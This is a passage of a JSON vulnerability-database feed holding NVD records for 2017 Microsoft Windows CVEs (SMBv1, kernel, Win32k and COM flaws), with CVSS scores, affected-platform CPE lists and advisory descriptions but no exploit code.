"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0272", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0272", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:31", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". 
This CVE ID is unique from CVE-2017-0269 and CVE-2017-0280.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0273", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0273", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:40", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". This CVE ID is unique from CVE-2017-0269 and CVE-2017-0273.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0280", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", 
"cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0280", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0280", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:27", "description": "The Microsoft Server Message Block 1.0 (SMBv1) allows denial of service when an attacker sends specially crafted requests to the server, aka \"Windows SMB Denial of Service Vulnerability\". 
This CVE ID is unique from CVE-2017-0273 and CVE-2017-0280.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0269", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0269", "CVE-2017-0273", "CVE-2017-0280"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0269", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0269", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:58", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0220, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0175", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2018-10-30T16:28:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", 
"cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0175", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:42", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, and Windows Server 2012 Gold allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0220", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", 
"cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0220", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:15", "description": "The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0258", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:18", "description": "The Windows kernel in Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0258.", "cvss3": 
{"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0259", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-0259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0259", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:49:20", "description": "A kernel-mode driver in Microsoft Windows XP SP3, Windows XP x64 XP2, Windows Server 2003 SP2, Windows Vista, Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, and Windows 8 allows an elevation of privilege when it fails to properly handle objects in memory, aka \"Win32k Elevation of Privilege Vulnerability\". This CVE is unique from CVE-2017-0263.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8552", "cwe": ["CWE-281"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263", "CVE-2017-8552"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-8552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8552", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", 
"cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". 
